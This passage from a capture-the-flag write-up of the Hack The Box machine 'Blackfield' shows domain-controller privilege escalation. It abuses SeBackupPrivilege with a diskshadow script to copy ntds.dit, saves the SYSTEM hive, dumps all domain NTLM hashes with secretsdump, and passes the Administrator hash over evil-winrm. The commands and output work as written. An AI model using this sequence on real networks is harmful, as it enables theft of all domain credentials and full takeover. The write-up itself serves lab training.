O:SYG:SYD:PAI(A;OICI;FA;;;SY)(A;OICI;FA;;;BA)(A;OICI;FA;;;LA)(A;OICI;FA;;;S-1-5-21-4194615774-2175524697-3563712290-1413) *Evil-WinRM* PS C:\> ``` > this did not work lol, it is was meant to work oo. good thing there is another method upnext #### Dumping the NTDS.dit Hashes with SeBackupPrivilege > If we attempt to use robocopy to make a copy of the ntds.dit file, we will find that it fails due to the process being used. ```sh *Evil-WinRM* PS C:\> robocopy /b C:\Windows\NTDS C:\Profiles NTDS.dit ------------------------------------------------------------------------------- ROBOCOPY :: Robust File Copy for Windows ------------------------------------------------------------------------------- Started : Tuesday, January 2, 2024 7:09:44 PM Source : C:\Windows\NTDS\ Dest : C:\Profiles\ Files : NTDS.dit Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30 ------------------------------------------------------------------------------ 1 C:\Windows\NTDS\ New File 18.0 m ntds.dit 2024/01/02 19:09:44 ERROR 32 (0x00000020) Copying File C:\Windows\NTDS\ntds.dit The process cannot access the file because it is being used by another process. ``` > For this reason, we will need to use the DiskShadow example from the post to make a shadow copy of the C:\ drive, which we will then be able to copy the ntds.dit file out of since it will not be “in-use”. > Since diskshadow.exe is an interactive command and we currently have a non-interactive session, we have to craft a TXT file that we can feed into diskshadow.exe. This will allow us to execute the necessary commands to create our shadow copy. > I used the following commands directly on the victim machine to craft the diskshadow.txt file: > Eseential command to run ```sh *Evil-WinRM* PS C:\> cd c:\ *Evil-WinRM* PS C:\> mkdir temp *Evil-WinRM* PS C:\> cd temp *Evil-WinRM* PS C:\temp> echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii *Evil-WinRM* PS C:\temp> echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append *Evil-WinRM* PS C:\temp> echo "create" | out-file ./diskshadow.txt -encoding ascii -append *Evil-WinRM* PS C:\temp> echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append *Evil-WinRM* PS C:\temp> diskshadow.exe /s c:\temp\diskshadow.txt Microsoft DiskShadow version 1.0 Copyright (C) 2013 Microsoft Corporation On computer: DC01, 1/2/2024 7:44:58 PM -> set context persistent nowriters -> add volume c: alias temp -> create Alias temp for shadow ID {9d0239b1-20b4-4d9b-bd00-172d5561efa0} set as environment variable. Alias VSS_SHADOW_SET for shadow set ID {e5b21137-0981-41b4-b7a4-20acb21bee85} set as environment variable. Querying all shadow copies with the shadow copy set ID {e5b21137-0981-41b4-b7a4-20acb21bee85} * Shadow copy ID = {9d0239b1-20b4-4d9b-bd00-172d5561efa0} %temp% - Shadow copy set: {e5b21137-0981-41b4-b7a4-20acb21bee85} %VSS_SHADOW_SET% - Original count of shadow copies = 1 - Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\] - Creation time: 1/2/2024 7:44:59 PM - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2 - Originating machine: DC01.BLACKFIELD.local - Service machine: DC01.BLACKFIELD.local - Not exposed - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5} - Attributes: No_Auto_Release Persistent No_Writers Differential Number of shadow copies listed: 1 -> expose %temp% z: -> %temp% = {9d0239b1-20b4-4d9b-bd00-172d5561efa0} The shadow copy was successfully exposed as z:\. -> *Evil-WinRM* PS C:\temp> ``` > seeing The shadow copy was successfully exposed as z:\. kinda feel like a good thing > With the Z:\ drive exposed, I can now use robocopy again but this time it will be used to move the backup ntds.dit file to my temp folder and not the running one. ```sh *Evil-WinRM* PS C:\temp> cd Z: *Evil-WinRM* PS Z:\> cd windows *Evil-WinRM* PS Z:\windows> cd ntds *Evil-WinRM* PS Z:\windows\ntds> robocopy /b .\ C:\temp NTDS.dit ------------------------------------------------------------------------------- ROBOCOPY :: Robust File Copy for Windows ------------------------------------------------------------------------------- Started : Tuesday, January 2, 2024 7:50:17 PM Source : Z:\windows\ntds\ Dest : C:\temp\ Files : NTDS.dit Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30 ------------------------------------------------------------------------------ ...[snip]... ``` > After grabbing the ntds.dit file, we will need to also grab the SYSTEM file from the registry and then send both of these over to our attacker machine to be dumped locally. > > And then to exfiltrate these files this time, we can use evil-winrm’s built-in download command like so: ```sh *Evil-WinRM* PS Z:\windows\ntds> cd C:\temp *Evil-WinRM* PS C:\temp> reg.exe save hklm\system C:\temp\system.bak The operation completed successfully. *Evil-WinRM* PS C:\temp> download ntds.dit *Evil-WinRM* PS C:\temp> download system.bak ``` > The first time you run this command and you didn’t redirect it to a file and there was over 300 user’s. Redirecting the output makes it easier to parse. ```sh ┌──(kali㉿kali)-[~/HTB/blackfield] └─$ impacket-secretsdump -ntds ntds.dit -system system.bak LOCAL > hashes.txt ┌──(kali㉿kali)-[~/HTB/blackfield] └─$ cat hashes.txt | more Impacket v0.11.0 - Copyright 2023 Fortra [*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393 [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Searching for pekList, be patient [*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c [*] Reading and decrypting hashes from ntds.dit Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7f82cc4be7ee6ca0b417c0719479dbec::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d::: audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa::: support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212::: BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c::: ...[snip]... : BLACKFIELD.local\BLACKFIELD869335:1116:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c::: BLACKFIELD.local\BLACKFIELD319016:1117:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c::: BLACKFIELD.local\BLACKFIELD600999:1118:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c::: BLACKFIELD.local\BLACKFIELD894905:1119:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c::: BLACKFIELD.local\BLACKFIELD253541:1120:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c::: BLACKFIELD.local\BLACKFIELD175204:1121:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c::: ``` > Now that we have dumped all the hashes in the domain, the domain belongs to us! ### Pass-the-Hash Attack to get a Shell as the Domain Admin Account > We can crack the hash gotten yh, but it's easier to just pass the hash ```sh ┌──(kali㉿kali)-[~/HTB/blackfield] └─$ evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami blackfield\administrator *Evil-WinRM* PS C:\Users\Administrator\Documents> cd .. *Evil-WinRM* PS C:\Users\Administrator> cd Desktop *Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt 4375a629c7c67c8e29db269060c9**** *Evil-WinRM* PS C:\Users\Administrator\Desktop> ``` > Boom this method of priv escalation seem to work perfectly, I'm sticking with this method wallahi.. TIME TO EAT, i'm hungryyy